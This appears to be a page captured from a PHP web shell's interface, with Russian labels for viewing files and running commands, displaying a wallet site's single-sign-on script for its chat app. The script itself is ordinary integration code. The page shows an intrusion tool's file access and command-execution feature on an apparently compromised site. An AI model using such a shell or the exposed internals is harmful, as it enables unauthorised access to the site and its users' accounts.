PHP WebShell

• .. (вверх)
• [DIR] ..
• [FILE] index.php

Просмотр файла: index.php

<?php
// /chat/sso/index.php
// One-click SSO from wallet -> Grupo (same tab).

if (session_status() === PHP_SESSION_NONE) {
    session_start();
}

require_once __DIR__ . '/../../config/db_config.php';    // $conn (not used here but fine)
require_once __DIR__ . '/../../config/serv_config.php';  // GRUPO_BASE_URL, GRUPO_API_SECRET

// 1) Must have a logged-in wallet user with email in session
if (empty($_SESSION['email'])) {
    // If not logged in, send to login page as before
    header('Location: /auth/login.php?msg=' . urlencode('Please login to open Chat.'));
    exit;
}

$email     = $_SESSION['email'];
$firstName = $_SESSION['first_name'] ?? '';
$lastName  = $_SESSION['last_name']  ?? '';
$fullName  = trim($firstName . ' ' . $lastName);
if ($fullName === '') {
    $fullName = $email; // fallback: email if names not set
}

// 2) Grupo endpoints + fallback URL
$baseUrl     = rtrim(GRUPO_BASE_URL, '/');     // e.g. https://apps.bitcardo.net/chat
$apiUrl      = $baseUrl . '/api_request/';     // e.g. https://apps.bitcardo.net/chat/api_request/
$fallbackUrl = $baseUrl . '/';                 // always land inside chat app if SSO fails

// 3) Payload for login_session + auto-create
$payload = [
    'add'            => 'login_session',
    // Either "user" (username/email) OR full set when create_account=yes:
    'user'           => $email,               // used if account already exists
    'create_account' => 'yes',                // create if not present
    'email_address'  => $email,
    'username'       => $email,               // you chose email as the username
    'full_name'      => $fullName,
    'password'       => bin2hex(random_bytes(16)), // random; users won’t use it (SSO only)
    'site_role'      => 3,                    // "Registered"
    'api_secret_key' => GRUPO_API_SECRET,
];

// 4) POST to Grupo
$ch = curl_init($apiUrl);
curl_setopt_array($ch, [
    CURLOPT_POST           => true,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_TIMEOUT        => 20,
    CURLOPT_HTTPHEADER     => ['Content-Type: application/x-www-form-urlencoded'],
    CURLOPT_POSTFIELDS     => http_build_query($payload),
]);
$response = curl_exec($ch);
$curlErr  = curl_error($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// 5) Handle network error: log it, but still send user to chat app (no more redirecting to Bitcardo login)
if ($response === false) {
    error_log("[SSO] cURL error ({$httpCode}): {$curlErr}");
    header('Location: ' . $fallbackUrl);
    exit;
}

// 6) Decode JSON
$data = json_decode($response, true);
if (json_last_error() !== JSON_ERROR_NONE) {
    error_log("[SSO] Non-JSON response from Grupo ({$httpCode}): " . substr($response, 0, 1000));
    header('Location: ' . $fallbackUrl);
    exit;
}

// 7) Success → redirect to Grupo's auto_login_url (preferred)
if (!empty($data['auto_login_url'])) {
    header('Location: ' . $data['auto_login_url']);
    exit;
}

// Some Grupo setups may return a generic 'url' key instead
if (!empty($data['url'])) {
    header('Location: ' . $data['url']);
    exit;
}

// 8) If Grupo sent a message/error, log it for debugging, then still go to chat app
if (!empty($data['message'])) {
    error_log("[SSO] Grupo message: " . $data['message']);
}

// Final fallback: open chat app root, not Bitcardo login
header('Location: ' . $fallbackUrl);
exit;

Выполнить команду